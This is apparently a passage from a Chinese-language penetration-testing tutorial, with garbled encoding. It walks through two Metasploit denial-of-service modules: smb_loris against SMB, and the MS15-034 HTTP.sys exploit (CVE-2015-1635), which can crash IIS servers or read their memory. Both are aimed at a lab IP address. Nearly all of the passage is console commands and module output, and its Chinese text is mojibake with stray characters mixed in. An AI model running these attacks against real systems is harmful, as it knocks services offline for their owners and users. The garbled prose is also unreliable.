對(duì)SMB協(xié)議
# 先將攻擊機(jī)的網(wǎng)絡(luò)連接數(shù)設(shè)置到最大
ulimit -n 65535
# 使用smb_loris菠剩,會(huì)導(dǎo)致目標(biāo)機(jī)器的內(nèi)存使用率增大
msf > use auxiliary/dos/smb/smb_loris
msf auxiliary(dos/smb/smb_loris) > show options
Module options (auxiliary/dos/smb/smb_loris):
Name Current Setting Required Description
---- --------------- -------- -----------
rhost yes The target address
rport 445 yes SMB port on the target
msf auxiliary(dos/smb/smb_loris) > set rhost 192.168.10.122
rhost => 192.168.10.122
msf auxiliary(dos/smb/smb_loris) > run
HTTP.sys的安全漏洞
編號(hào)為:CVE-2015-1635(MS15-034 )筑公。利用HTTP.sys的安全漏洞技竟,攻擊者只需要發(fā)送惡意的http請(qǐng)求數(shù)據(jù)包,就可能遠(yuǎn)程讀取IIS服務(wù)器的內(nèi)存數(shù)據(jù),或使服務(wù)器系統(tǒng)藍(lán)屏崩潰
msf > use auxiliary/dos/http/ms15_034_ulonglongadd
msf auxiliary(dos/http/ms15_034_ulonglongadd) > show options
Module options (auxiliary/dos/http/ms15_034_ulonglongadd):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.122
rhosts => 192.168.10.122
msf auxiliary(dos/http/ms15_034_ulonglongadd) > run
